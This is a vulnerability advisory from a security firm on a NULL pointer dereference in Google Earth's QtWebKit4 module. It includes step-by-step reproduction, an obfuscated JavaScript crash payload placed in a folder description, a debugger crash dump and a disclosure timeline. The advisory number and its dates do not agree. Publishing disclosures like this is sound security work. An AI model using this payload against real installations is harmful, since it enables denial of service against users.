2017-010: Google Earth 'QtWebKit4' NULL Pointer Dereference Vulnerability

Original release date: January 20, 2016
Last revised: January 20, 2016
Discovered by: Fabián Cuchietti
Severity: 4/5

BACKGROUND

Google Earth is a virtual globe, map and geographical information program that was originally called EarthViewer 3D created by Keyhole, Inc, a Central Intelligence Agency (CIA) funded company acquired by Google in 2004.

DESCRIPTION

NULL pointer dereference erros are common in C/C++ languages. Pointer is a programming language data type that references a location in memory. Once the value of the location is obtained by the pointer, this pointer is considered dereferenced. The NULL pointer dereference weakness occurs where application dereferences a pointer that is expected to be a valid address but instead is equal to NULL.

PROOF OF CONCEPT 

1) Open Google Earth

2) My Places

3) Right click> Add> Folder

4) Select a name for your folder

5) Description: Here we insert our payload > OK

{Payload: <script type="text/javascript">
    String.prototype.repeat = function( num )
    {return new Array( num + 1 ).join( this );}
    var i=0;
    var r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9*9/9*9;
    var bib=String.fromCharCode(60, 120, 104, 116, 58, 97, 99, 114,
    111, 110, 121, 109, 32, 115, 116, 121, 108, 101, 61, 34, 102, 111,
    110, 116, 58, 49, 48, 48, 48, 48, 48, 37, 32, 102, 105, 120, 101, 100,
    115, 121, 115, 59, 32, 115, 116, 121, 108, 101, 61, 34, 120, 115, 115,
    58, 101, 120, 112, 114, 101, 115, 115, 105, 111, 110, 40, 97, 108, 101,
    114, 116, 40, 49, 41, 41, 34, 32, 32, 45, 109, 111, 122,
    45, 98)+r+String.fromCharCode(105, 110, 100, 105, 110, 103, 58, 117,
    114, 108, 40, 35, 49, 49, 41, 59, 32, 102, 111, 110, 116, 45, 102, 97,
    109, 105, 108, 121, 58, 102, 105, 120, 101, 100, 115, 121, 115, 59, 34,
    62, 49, 32, 49, 60, 47, 120, 104, 116, 58, 97, 99, 114, 111, 110, 121, 109,
    62, 10);
    document.write(bib.repeat(9999999));
   </script> }
  
6) Click the folder created with the payload

DUMP:

FAULTING_IP:
+89cde
00000000 ??              ???

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 00000000
Attempt to execute non-executable address 00000000

PROCESS_NAME:  googleearth.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  00000000

WRITE_ADDRESS:  00000000

FOLLOWUP_IP:
QtWebKit4+89cde
5c9f9cde ??              ???

FAILED_INSTRUCTION_ADDRESS:
+89cde
00000000 ??              ???

FAULTING_THREAD:  00001044

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_NULL

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_NULL

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL

LAST_CONTROL_TRANSFER:  from 5c9f9cde to 00000000

STACK_TEXT: 
WARNING: Frame IP not in any known module. Following frames may be wrong.
002cafb8 5c9f9cde 002cb05c 5c9b74f1 5e9c7916 0x0
002cafbc 002cb05c 5c9b74f1 5e9c7916 00000000 QtWebKit4+0x89cde
002cafc0 5c9b74f1 5e9c7916 00000000 00000000 0x2cb05c
002cb05c 00000000 00000000 00000000 00000000 QtWebKit4+0x474f1


STACK_COMMAND:  ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  qtwebkit4+89cde

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: QtWebKit4

IMAGE_NAME:  QtWebKit4.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  4e010a08

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL_c0000005_QtWebKit4.dll!Unknown

BUSINESS IMPACT

In most cases, NULL pointer dereference errors result in the crash of application however, remote code execution is possible under certain circumstances. Depending on privileges of the application, this weakness can result in a denial of service attack against the entire system or can be used to gain complete control over it.

SYSTEMS AFFECTED

https://www.google.com/earth/

SOLUTION

-

REVISION HISTORY

December 13, 2015 Initial release.

DISCLOSURE TIMELINE

  • December 13, 2015   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
  • December 13, 2015   Contact with Google Security Team.
  • December 14, 2015   Vendor Response/Feedback.
  • January  20, 2016   Advisory published.

REFERENCES

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain and Colombia based company leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.